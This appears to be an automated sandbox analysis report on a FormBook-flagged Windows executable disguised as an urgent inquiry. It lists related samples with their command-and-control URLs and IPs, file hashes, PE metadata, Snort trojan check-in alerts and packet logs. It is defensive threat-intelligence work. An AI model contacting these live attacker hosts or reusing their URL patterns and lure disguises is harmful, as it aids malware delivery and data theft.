                                          • www.ils.network/ny9y/?2dT8lD=KDfa+xhR9Uu624ix//uQmF9gETjhYiWhpw2JcjceV0fLTQRkTfZxHZ0DtmO8B955MtUEvKAThw==&JFN=Kn5T66A0sL
                                          Updated SOA.exeGet hashmaliciousBrowse
                                          • www.sunshinefamilysupport.com/b2c0/?_JE=OHhY/R7K/8h4MegcVZK1Xj4hyqShMd99eYdWuTQY8l2Zovp1jXuaaoSrFKSMy8PCBLbw&-Z=9rjLOxDhNVLl4X
                                          PI.exeGet hashmaliciousBrowse
                                          • www.curbside-chauffeur.com/p5a0/?RRLhe=Kd9tst9hnRdDjTf&DDHLa=JukudkUxVbTdYVRCF1pRAg//CNbN5JQgiNrlEuxrFjBtGyo8wRk0rCj0IsBEGr8jTPnb
                                          truck pictures.exeGet hashmaliciousBrowse
                                          • www.thedoublezbar.com/cuig/?9rKPkT=2dfXcPxP_&yTbXp6=L4FDgVEe6HzbIw7Y2w/E2vM4Pqwo2/ISkut8UHGVfA5peMbnmrR+nhbhMXYOuT+Z8/IE
                                          PO.exeGet hashmaliciousBrowse
                                          • www.pillepet.com/ig04/?0DH8qx3=inCZr7bvriWCJESOkGlsHmgEHnLe1RVpPF1LCT4Dyzyk21fEKPQ7t4RGICHqr8RqPiAZk8+zEw==&jL3=-ZrdqHw
                                          Listed P.O.exeGet hashmaliciousBrowse
                                          • www.whitefieldkarate.com/wf43/?UlWh=si/TE1/+g5ZtSjdgusrACU9kFAEctjt7rhNZ5WcpIZtq1AiuPv7wMhxPCHpsJixsAyn90HZKzQ==&2du8z=V0DheNaPGHVlSPe
                                          arrival notice.exeGet hashmaliciousBrowse
                                          • www.ilovecoventry.com/n58i/?jrU4NBtp=SuMp/r8m7MLbsAhdx2+vo4RDv4Fspb+bmHugmTCD5o7ZU3vK4HF56dfp1g0HnRS7M8EDPfOdWw==&vbOlS=UboLn
                                          Wg1UpQ3DEC.exeGet hashmaliciousBrowse
                                          • www.soulardfranklinroom.com/bckt/?8pNlv=i0G8PfHxDD&5jU0C=AuGe9zZ/Lbdazaz/uR/POFPjqzlbiRMFvn4xVXtErRM9l207eeRtS2/KOxa7EAk7RHmg

                                          Domains

                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext

                                          ASN

                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                          ONEANDONE-ASBrauerstrasse48DEejecutable2.exeGet hashmaliciousBrowse
                                          • 217.160.0.222
                                          index_2021-09-25-14_08.exeGet hashmaliciousBrowse
                                          • 217.160.0.15
                                          IKpep4Zn5S.exeGet hashmaliciousBrowse
                                          • 217.160.230.95
                                          MV DINA QUEEN.xlsxGet hashmaliciousBrowse
                                          • 217.160.230.95
                                          PAYMENT COPY.exeGet hashmaliciousBrowse
                                          • 217.160.0.159
                                          Medical Order 092021.exeGet hashmaliciousBrowse
                                          • 217.160.0.250
                                          cs.exeGet hashmaliciousBrowse
                                          • 217.174.240.46
                                          DUE PAYMENT.exeGet hashmaliciousBrowse
                                          • 74.208.236.156
                                          INV 563256 and 373PDF.exeGet hashmaliciousBrowse
                                          • 74.208.236.222
                                          SYsObQNkC1.exeGet hashmaliciousBrowse
                                          • 217.160.0.253
                                          v2XwLpMqG5.exeGet hashmaliciousBrowse
                                          • 217.160.0.177
                                          1vY5i8g38s.exeGet hashmaliciousBrowse
                                          • 217.160.243.54
                                          JNk46WKTxo.exeGet hashmaliciousBrowse
                                          • 212.227.210.118
                                          KTi0r6xqtH.exeGet hashmaliciousBrowse
                                          • 77.68.79.72
                                          Z14S9Zolcyub1pd.exeGet hashmaliciousBrowse
                                          • 217.76.156.252
                                          SOA.exeGet hashmaliciousBrowse
                                          • 213.171.195.105
                                          UfJYgKlooF.exeGet hashmaliciousBrowse
                                          • 74.208.236.226
                                          Payment Proof pdf.exeGet hashmaliciousBrowse
                                          • 74.208.236.82
                                          justificante de la transfer.exeGet hashmaliciousBrowse
                                          • 212.227.15.142
                                          UPDATED e-STATEMENT..exeGet hashmaliciousBrowse
                                          • 217.160.0.49
                                          ALTUSNLZJYhnDLhwa.exeGet hashmaliciousBrowse
                                          • 31.3.152.100
                                          ZfigYV6HXd.exeGet hashmaliciousBrowse
                                          • 31.3.152.100
                                          g4E1F7Lc2O.exeGet hashmaliciousBrowse
                                          • 31.3.152.100
                                          yVhvGnsUpL.exeGet hashmaliciousBrowse
                                          • 31.3.152.100
                                          BoFA_Remittance Advice_21219.xlsmGet hashmaliciousBrowse
                                          • 31.3.152.100
                                          IQl00lxPjo.exeGet hashmaliciousBrowse
                                          • 31.3.152.100
                                          PDF.FILE#1145523.vbsGet hashmaliciousBrowse
                                          • 206.123.147.48
                                          YINFFTpCA4.exeGet hashmaliciousBrowse
                                          • 79.142.76.244
                                          Instruction copy.exeGet hashmaliciousBrowse
                                          • 213.5.70.58
                                          XoN2GgRiga.exeGet hashmaliciousBrowse
                                          • 128.127.105.184
                                          28lvYsFGLl.exeGet hashmaliciousBrowse
                                          • 128.127.105.184
                                          DECL G50 EURL.xlsxGet hashmaliciousBrowse
                                          • 128.127.105.184
                                          byodInstCL.exeGet hashmaliciousBrowse
                                          • 79.142.69.9
                                          x4xlPw0K93.exeGet hashmaliciousBrowse
                                          • 79.142.76.244
                                          faktura #696498.xlsxGet hashmaliciousBrowse
                                          • 79.142.76.244
                                          0DySn8eZVx.exeGet hashmaliciousBrowse
                                          • 79.142.66.239
                                          LdmcHfRWKM.exeGet hashmaliciousBrowse
                                          • 79.142.66.239
                                          bkCtR51L3O.exeGet hashmaliciousBrowse
                                          • 79.142.73.155
                                          JUSTIFICANTE TRANSFERENCIA.xlsxGet hashmaliciousBrowse
                                          • 79.142.73.155
                                          7Frr8Rl49L.exeGet hashmaliciousBrowse
                                          • 185.10.56.4

                                          JA3 Fingerprints

                                          No context

                                          Dropped Files

                                          No context

                                          Created / dropped Files

                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Inquiry-URGENT.exe.log
                                          Process:C:\Users\user\Desktop\Inquiry-URGENT.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):1216
                                          Entropy (8bit):5.355304211458859
                                          Encrypted:false
                                          SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
                                          MD5:FED34146BF2F2FA59DCF8702FCC8232E
                                          SHA1:B03BFEA175989D989850CF06FE5E7BBF56EAA00A
                                          SHA-256:123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
                                          SHA-512:1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
                                          Malicious:true
                                          Reputation:high, very likely benign file
                                          Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

                                          Static File Info

                                          General

                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Entropy (8bit):7.554495827272038
                                          TrID:
                                          • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                          • Win32 Executable (generic) a (10002005/4) 49.75%
                                          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                          • Windows Screen Saver (13104/52) 0.07%
                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                          File name:Inquiry-URGENT.exe
                                          File size:443904
                                          MD5:001127ea6a36d3b93e8c54ff1b8f22b8
                                          SHA1:acd9171ec5641efc54a16c5c18184dd6e25138c8
                                          SHA256:2728dc98fdebc00823b877eba49ace782c17db8a07074634aafca9dc00277776
                                          SHA512:7a5687835380616daa433ce196fdb7badfcf74f0e1e4cb97c4064ac0eea1b633b0ed536ea409519d09a5f5c341861b1930242a3f8c706eb58f52defab8e2110f
                                          SSDEEP:12288:OIF/OGaxwRNRWMDABT4ZxzOiGLbrh9yU9:OIFy2NsMDA54Z8dbrhN9
                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...b.Oa..............0.................. ........@.. ....................... ............@................................

                                          File Icon

                                          Icon Hash:00828e8e8686b000

                                          Static PE Info

                                          General

                                          Entrypoint:0x46d816
                                          Entrypoint Section:.text
                                          Digitally signed:false
                                          Imagebase:0x400000
                                          Subsystem:windows gui
                                          Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                          DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                          Time Stamp:0x614FC662 [Sun Sep 26 01:01:22 2021 UTC]
                                          TLS Callbacks:
                                          CLR (.Net) Version:v4.0.30319
                                          OS Version Major:4
                                          OS Version Minor:0
                                          File Version Major:4
                                          File Version Minor:0
                                          Subsystem Version Major:4
                                          Subsystem Version Minor:0
                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                          Entrypoint Preview

                                          Instruction
                                          jmp dword ptr [00402000h]
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al

                                          Data Directories

                                          NameVirtual AddressVirtual Size Is in Section
                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x6d7c40x4f.text
                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x6e0000x658.rsrc
                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x700000xc.reloc
                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                          Sections

                                          NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                          .text0x20000x6b81c0x6ba00False0.852605981417data7.57244291129IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                          .rsrc0x6e0000x6580x800False0.34033203125data3.53078512216IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                          .reloc0x700000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                          Resources

                                          NameRVASizeTypeLanguageCountry
                                          RT_VERSION0x6e0900x3c8data
                                          RT_MANIFEST0x6e4680x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                          Imports

                                          DLLImport
                                          mscoree.dll_CorExeMain

                                          Version Infos

                                          DescriptionData
                                          Translation0x0000 0x04b0
                                          LegalCopyrightCopyright 2018 - 2021
                                          Assembly Version1.0.0.0
                                          InternalNameResourceTableMappingEntryField.exe
                                          FileVersion1.0.0.0
                                          CompanyNameXCodes
                                          LegalTrademarks
                                          Comments
                                          ProductNameCafe Management Systems
                                          ProductVersion1.0.0.0
                                          FileDescriptionCafe Management Systems
                                          OriginalFilenameResourceTableMappingEntryField.exe

                                          Network Behavior

                                          Snort IDS Alerts

                                          TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                          09/27/21-17:55:12.501653TCP2031453ET TROJAN FormBook CnC Checkin (GET)4980280192.168.2.434.102.136.180
                                          09/27/21-17:55:12.501653TCP2031449ET TROJAN FormBook CnC Checkin (GET)4980280192.168.2.434.102.136.180
                                          09/27/21-17:55:12.501653TCP2031412ET TROJAN FormBook CnC Checkin (GET)4980280192.168.2.434.102.136.180
                                          09/27/21-17:55:12.615388TCP1201ATTACK-RESPONSES 403 Forbidden804980234.102.136.180192.168.2.4
                                          09/27/21-17:55:17.866120TCP1201ATTACK-RESPONSES 403 Forbidden804981834.102.136.180192.168.2.4
                                          09/27/21-17:55:28.479546TCP2031453ET TROJAN FormBook CnC Checkin (GET)4982080192.168.2.434.252.217.69
                                          09/27/21-17:55:28.479546TCP2031449ET TROJAN FormBook CnC Checkin (GET)4982080192.168.2.434.252.217.69
                                          09/27/21-17:55:28.479546TCP2031412ET TROJAN FormBook CnC Checkin (GET)4982080192.168.2.434.252.217.69
                                          09/27/21-17:55:49.292538TCP2031453ET TROJAN FormBook CnC Checkin (GET)4984380192.168.2.4103.100.209.77
                                          09/27/21-17:55:49.292538TCP2031449ET TROJAN FormBook CnC Checkin (GET)4984380192.168.2.4103.100.209.77
                                          09/27/21-17:55:49.292538TCP2031412ET TROJAN FormBook CnC Checkin (GET)4984380192.168.2.4103.100.209.77
                                          09/27/21-17:56:17.096940TCP2031453ET TROJAN FormBook CnC Checkin (GET)4987180192.168.2.4209.99.64.43
                                          09/27/21-17:56:17.096940TCP2031449ET TROJAN FormBook CnC Checkin (GET)4987180192.168.2.4209.99.64.43
                                          09/27/21-17:56:17.096940TCP2031412ET TROJAN FormBook CnC Checkin (GET)4987180192.168.2.4209.99.64.43

                                          Network Port Distribution

                                          TCP Packets

                                          TimestampSource PortDest PortSource IPDest IP
                                          Sep 27, 2021 17:55:12.487960100 CEST4980280192.168.2.434.102.136.180
                                          Sep 27, 2021 17:55:12.501250982 CEST804980234.102.136.180192.168.2.4
                                          Sep 27, 2021 17:55:12.501367092 CEST4980280192.168.2.434.102.136.180
                                          Sep 27, 2021 17:55:12.501652956 CEST4980280192.168.2.434.102.136.180
                                          Sep 27, 2021 17:55:12.514234066 CEST804980234.102.136.180192.168.2.4
                                          Sep 27, 2021 17:55:12.615387917 CEST804980234.102.136.180192.168.2.4
                                          Sep 27, 2021 17:55:12.615425110 CEST804980234.102.136.180192.168.2.4
                                          Sep 27, 2021 17:55:12.615672112 CEST4980280192.168.2.434.102.136.180
                                          Sep 27, 2021 17:55:12.615711927 CEST4980280192.168.2.434.102.136.180
                                          Sep 27, 2021 17:55:12.628406048 CEST804980234.102.136.180192.168.2.4
                                          Sep 27, 2021 17:55:17.669399977 CEST4981880192.168.2.434.102.136.180
                                          Sep 27, 2021 17:55:17.685142994 CEST804981834.102.136.180192.168.2.4
                                          Sep 27, 2021 17:55:17.685412884 CEST4981880192.168.2.434.102.136.180
                                          Sep 27, 2021 17:55:17.685591936 CEST4981880192.168.2.434.102.136.180
                                          Sep 27, 2021 17:55:17.698788881 CEST804981834.102.136.180192.168.2.4
                                          Sep 27, 2021 17:55:17.866120100 CEST804981834.102.136.180192.168.2.4
                                          Sep 27, 2021 17:55:17.866156101 CEST804981834.102.136.180192.168.2.4
                                          Sep 27, 2021 17:55:17.866466045 CEST4981880192.168.2.434.102.136.180
                                          Sep 27, 2021 17:55:17.866560936 CEST4981880192.168.2.434.102.136.180
                                          Sep 27, 2021 17:55:17.879565954 CEST804981834.102.136.180192.168.2.4
                                          Sep 27, 2021 17:55:22.923449039 CEST4981980192.168.2.4184.168.131.241
                                          Sep 27, 2021 17:55:23.104924917 CEST8049819184.168.131.241192.168.2.4
                                          Sep 27, 2021 17:55:23.105020046 CEST4981980192.168.2.4184.168.131.241
                                          Sep 27, 2021 17:55:23.105173111 CEST4981980192.168.2.4184.168.131.241
                                          Sep 27, 2021 17:55:23.287373066 CEST8049819184.168.131.241192.168.2.4
                                          Sep 27, 2021 17:55:23.340370893 CEST8049819184.168.131.241192.168.2.4
                                          Sep 27, 2021 17:55:23.340398073 CEST8049819184.168.131.241192.168.2.4
                                          Sep 27, 2021 17:55:23.340558052 CEST4981980192.168.2.4184.168.131.241
                                          Sep 27, 2021 17:55:23.340625048 CEST4981980192.168.2.4184.168.131.241
                                          Sep 27, 2021 17:55:23.522697926 CEST8049819184.168.131.241192.168.2.4
                                          Sep 27, 2021 17:55:28.442023039 CEST4982080192.168.2.434.252.217.69
                                          Sep 27, 2021 17:55:28.478934050 CEST804982034.252.217.69192.168.2.4
                                          Sep 27, 2021 17:55:28.479159117 CEST4982080192.168.2.434.252.217.69
                                          Sep 27, 2021 17:55:28.479546070 CEST4982080192.168.2.434.252.217.69
                                          Sep 27, 2021 17:55:28.516602993 CEST804982034.252.217.69192.168.2.4
                                          Sep 27, 2021 17:55:28.520457983 CEST804982034.252.217.69192.168.2.4
                                          Sep 27, 2021 17:55:28.520497084 CEST804982034.252.217.69192.168.2.4
                                          Sep 27, 2021 17:55:28.520797968 CEST4982080192.168.2.434.252.217.69
                                          Sep 27, 2021 17:55:28.520929098 CEST4982080192.168.2.434.252.217.69
                                          Sep 27, 2021 17:55:28.557346106 CEST804982034.252.217.69192.168.2.4
                                          Sep 27, 2021 17:55:33.636688948 CEST4982180192.168.2.4213.5.70.60
                                          Sep 27, 2021 17:55:33.661259890 CEST8049821213.5.70.60192.168.2.4
                                          Sep 27, 2021 17:55:33.664014101 CEST4982180192.168.2.4213.5.70.60
                                          Sep 27, 2021 17:55:33.664252996 CEST4982180192.168.2.4213.5.70.60
                                          Sep 27, 2021 17:55:33.688715935 CEST8049821213.5.70.60192.168.2.4
                                          Sep 27, 2021 17:55:33.689775944 CEST8049821213.5.70.60192.168.2.4
                                          Sep 27, 2021 17:55:33.690278053 CEST4982180192.168.2.4213.5.70.60
                                          Sep 27, 2021 17:55:33.690399885 CEST4982180192.168.2.4213.5.70.60
                                          Sep 27, 2021 17:55:33.714744091 CEST8049821213.5.70.60192.168.2.4
                                          Sep 27, 2021 17:55:49.097541094 CEST4984380192.168.2.4103.100.209.77
                                          Sep 27, 2021 17:55:49.292098999 CEST8049843103.100.209.77192.168.2.4
                                          Sep 27, 2021 17:55:49.292382002 CEST4984380192.168.2.4103.100.209.77
                                          Sep 27, 2021 17:55:49.292537928 CEST4984380192.168.2.4103.100.209.77
                                          Sep 27, 2021 17:55:49.488394022 CEST8049843103.100.209.77192.168.2.4
                                          Sep 27, 2021 17:55:49.488429070 CEST8049843103.100.209.77192.168.2.4
                                          Sep 27, 2021 17:55:49.488816023 CEST4984380192.168.2.4103.100.209.77
                                          Sep 27, 2021 17:55:49.488869905 CEST4984380192.168.2.4103.100.209.77
                                          Sep 27, 2021 17:55:49.683636904 CEST8049843103.100.209.77192.168.2.4
                                          Sep 27, 2021 17:55:54.558693886 CEST4984480192.168.2.474.208.236.139
                                          Sep 27, 2021 17:55:54.691288948 CEST804984474.208.236.139192.168.2.4
                                          Sep 27, 2021 17:55:54.691519022 CEST4984480192.168.2.474.208.236.139
                                          Sep 27, 2021 17:55:54.691708088 CEST4984480192.168.2.474.208.236.139
                                          Sep 27, 2021 17:55:54.824775934 CEST804984474.208.236.139192.168.2.4
                                          Sep 27, 2021 17:55:55.071660995 CEST804984474.208.236.139192.168.2.4
                                          Sep 27, 2021 17:55:55.071681023 CEST804984474.208.236.139192.168.2.4
                                          Sep 27, 2021 17:55:55.075066090 CEST4984480192.168.2.474.208.236.139
                                          Sep 27, 2021 17:55:55.075100899 CEST4984480192.168.2.474.208.236.139
                                          Sep 27, 2021 17:55:55.216759920 CEST804984474.208.236.139192.168.2.4
                                          Sep 27, 2021 17:56:00.245167971 CEST4984580192.168.2.4162.241.61.210
                                          Sep 27, 2021 17:56:00.386185884 CEST8049845162.241.61.210192.168.2.4
                                          Sep 27, 2021 17:56:00.387414932 CEST4984580192.168.2.4162.241.61.210
                                          Sep 27, 2021 17:56:00.387617111 CEST4984580192.168.2.4162.241.61.210
                                          Sep 27, 2021 17:56:00.528702974 CEST8049845162.241.61.210192.168.2.4
                                          Sep 27, 2021 17:56:00.801204920 CEST8049845162.241.61.210192.168.2.4
                                          Sep 27, 2021 17:56:00.802794933 CEST8049845162.241.61.210192.168.2.4
                                          Sep 27, 2021 17:56:00.804419994 CEST8049845162.241.61.210192.168.2.4
                                          Sep 27, 2021 17:56:00.805219889 CEST4984580192.168.2.4162.241.61.210
                                          Sep 27, 2021 17:56:00.805241108 CEST8049845162.241.61.210192.168.2.4
                                          Sep 27, 2021 17:56:00.805265903 CEST8049845162.241.61.210192.168.2.4
                                          Sep 27, 2021 17:56:00.805289030 CEST8049845162.241.61.210192.168.2.4
                                          Sep 27, 2021 17:56:00.805313110 CEST8049845162.241.61.210192.168.2.4
                                          Sep 27, 2021 17:56:00.805321932 CEST4984580192.168.2.4162.241.61.210
                                          Sep 27, 2021 17:56:00.805336952 CEST8049845162.241.61.210192.168.2.4
                                          Sep 27, 2021 17:56:00.805345058 CEST4984580192.168.2.4162.241.61.210
                                          Sep 27, 2021 17:56:00.805360079 CEST8049845162.241.61.210192.168.2.4
                                          Sep 27, 2021 17:56:00.805382967 CEST8049845162.241.61.210192.168.2.4
                                          Sep 27, 2021 17:56:00.805393934 CEST4984580192.168.2.4162.241.61.210
                                          Sep 27, 2021 17:56:00.805439949 CEST4984580192.168.2.4162.241.61.210
                                          Sep 27, 2021 17:56:00.946299076 CEST8049845162.241.61.210192.168.2.4
                                          Sep 27, 2021 17:56:00.946351051 CEST8049845162.241.61.210192.168.2.4
                                          Sep 27, 2021 17:56:00.946372986 CEST8049845162.241.61.210192.168.2.4
                                          Sep 27, 2021 17:56:00.946397066 CEST8049845162.241.61.210192.168.2.4
                                          Sep 27, 2021 17:56:00.946419954 CEST8049845162.241.61.210192.168.2.4
                                          Sep 27, 2021 17:56:00.946445942 CEST8049845162.241.61.210192.168.2.4
                                          Sep 27, 2021 17:56:00.946469069 CEST8049845162.241.61.210192.168.2.4
                                          Sep 27, 2021 17:56:00.948535919 CEST4984580192.168.2.4162.241.61.210
                                          Sep 27, 2021 17:56:00.948575020 CEST4984580192.168.2.4162.241.61.210
                                          Sep 27, 2021 17:56:01.633322954 CEST4984580192.168.2.4162.241.61.210
                                          Sep 27, 2021 17:56:01.777184963 CEST8049845162.241.61.210192.168.2.4

                                          UDP Packets

                                          TimestampSource PortDest PortSource IPDest IP
                                          Sep 27, 2021 17:54:25.155308962 CEST4925753192.168.2.48.8.8.8
                                          Sep 27, 2021 17:54:25.184159994 CEST53492578.8.8.8192.168.2.4
                                          Sep 27, 2021 17:54:48.498466015 CEST6238953192.168.2.48.8.8.8
                                          Sep 27, 2021 17:54:48.512417078 CEST53623898.8.8.8192.168.2.4
                                          Sep 27, 2021 17:54:49.158787012 CEST4991053192.168.2.48.8.8.8
                                          Sep 27, 2021 17:54:49.173811913 CEST53499108.8.8.8192.168.2.4
                                          Sep 27, 2021 17:54:49.929155111 CEST5585453192.168.2.48.8.8.8
                                          Sep 27, 2021 17:54:49.942218065 CEST53558548.8.8.8192.168.2.4
                                          Sep 27, 2021 17:54:50.455924034 CEST6454953192.168.2.48.8.8.8
                                          Sep 27, 2021 17:54:50.487427950 CEST6315353192.168.2.48.8.8.8
                                          Sep 27, 2021 17:54:50.488908052 CEST53645498.8.8.8192.168.2.4
                                          Sep 27, 2021 17:54:50.500950098 CEST53631538.8.8.8192.168.2.4
                                          Sep 27, 2021 17:54:51.165026903 CEST5299153192.168.2.48.8.8.8
                                          Sep 27, 2021 17:54:51.178481102 CEST53529918.8.8.8192.168.2.4
                                          Sep 27, 2021 17:54:52.241451979 CEST5370053192.168.2.48.8.8.8
                                          Sep 27, 2021 17:54:52.255192995 CEST53537008.8.8.8192.168.2.4
                                          Sep 27, 2021 17:54:54.329999924 CEST5172653192.168.2.48.8.8.8
                                          Sep 27, 2021 17:54:54.401370049 CEST53517268.8.8.8192.168.2.4
                                          Sep 27, 2021 17:54:56.203871012 CEST5679453192.168.2.48.8.8.8
                                          Sep 27, 2021 17:54:56.270222902 CEST53567948.8.8.8192.168.2.4
                                          Sep 27, 2021 17:54:57.067940950 CEST5653453192.168.2.48.8.8.8
                                          Sep 27, 2021 17:54:57.152224064 CEST53565348.8.8.8192.168.2.4
                                          Sep 27, 2021 17:54:57.642628908 CEST5662753192.168.2.48.8.8.8
                                          Sep 27, 2021 17:54:57.655447006 CEST53566278.8.8.8192.168.2.4
                                          Sep 27, 2021 17:55:05.540107965 CEST5662153192.168.2.48.8.8.8
                                          Sep 27, 2021 17:55:05.561368942 CEST53566218.8.8.8192.168.2.4
                                          Sep 27, 2021 17:55:07.083395958 CEST6311653192.168.2.48.8.8.8
                                          Sep 27, 2021 17:55:07.122678995 CEST53631168.8.8.8192.168.2.4
                                          Sep 27, 2021 17:55:12.453551054 CEST6407853192.168.2.48.8.8.8
                                          Sep 27, 2021 17:55:12.482510090 CEST53640788.8.8.8192.168.2.4
                                          Sep 27, 2021 17:55:17.625284910 CEST6480153192.168.2.48.8.8.8
                                          Sep 27, 2021 17:55:17.665668011 CEST53648018.8.8.8192.168.2.4
                                          Sep 27, 2021 17:55:22.896137953 CEST6172153192.168.2.48.8.8.8
                                          Sep 27, 2021 17:55:22.922290087 CEST53617218.8.8.8192.168.2.4
                                          Sep 27, 2021 17:55:28.364178896 CEST5125553192.168.2.48.8.8.8
                                          Sep 27, 2021 17:55:28.439892054 CEST53512558.8.8.8192.168.2.4
                                          Sep 27, 2021 17:55:33.564146996 CEST6152253192.168.2.48.8.8.8
                                          Sep 27, 2021 17:55:33.632623911 CEST53615228.8.8.8192.168.2.4
                                          Sep 27, 2021 17:55:36.916059971 CEST5233753192.168.2.48.8.8.8
                                          Sep 27, 2021 17:55:36.929743052 CEST53523378.8.8.8192.168.2.4
                                          Sep 27, 2021 17:55:37.640264034 CEST5504653192.168.2.48.8.8.8
